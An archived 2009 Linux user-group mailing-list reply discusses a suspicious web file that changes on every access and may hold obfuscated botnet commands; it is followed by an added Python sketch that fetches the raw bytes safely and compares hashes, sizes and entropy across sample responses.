[SATLUG] Strange file.

Jon Mark Allen jm at allensonthe.net
Tue Jan 13 16:27:02 CST 2009


> it looks as if someone set that up with exploit code... maybe. See what it does on Winblows. You may have averted an attack by using Linux.

The file is different each time it's accessed.

xxd tmp/strange-file.txt 


xxd tmp/strange-file2.txt 


xxd tmp/strange-file3.txt 


Probably some sort of obfuscated CC Bot commands would be my guess.

I for one wouldn't access it with a standard browser at all.

Try netcat or links2 (with -dump option)

Any way you look at it, I would do some serious investigation on the
clients that are accessing that URI.

Jon Mark
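
The approach suggested in the message above (pull the raw bytes without a browser, then compare what comes back on each request), sketched as an added example that is not part of the original post. The function names and the sample responses are constructed for illustration; the host and path passed to `fetch_raw` would be whatever URI is under investigation.

```python
import hashlib
import math
import socket
from collections import Counter

def fetch_raw(host, path, port=80, limit=65536, timeout=10):
    """HTTP/1.0 GET over a bare socket: nothing is rendered, run or redirected."""
    request = f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")
    data = b""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        while len(data) < limit:          # hard cap on how much we accept
            chunk = sock.recv(4096)
            if not chunk:
                break
            data += chunk
    return data[:limit]

def split_body(raw):
    """Separate the header block from the body of a raw HTTP response."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    return (head, body) if sep else (b"", raw)

def entropy(data):
    """Shannon entropy in bits per byte (0.0 = constant, 8.0 = uniform)."""
    if not data:
        return 0.0
    total = len(data)
    return -sum(n / total * math.log2(n / total) for n in Counter(data).values())

def compare(raw_responses):
    """Summarise several fetches of the same URI without interpreting them."""
    bodies = [split_body(r)[1] for r in raw_responses]
    return {
        "distinct": len({hashlib.sha256(b).hexdigest() for b in bodies}),
        "sizes": [len(b) for b in bodies],
        "entropy": [round(entropy(b), 2) for b in bodies],
    }

# Constructed sample responses (not the data from the post).
SAMPLES = [
    b"HTTP/1.0 200 OK\r\n\r\n   \x8a\x11Eq\n   z\xf0\x02\n",
    b"HTTP/1.0 200 OK\r\n\r\n   U\xc4\x90\n   \x07kk\xe1\n",
    b"HTTP/1.0 200 OK\r\n\r\n   \xae\x33\n",
]

if __name__ == "__main__":
    print(compare(SAMPLES))
```

A `distinct` count equal to the number of fetches confirms the body changes on every request; entropy near 8 bits per byte on a reasonably large body points to encrypted or compressed data rather than text.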


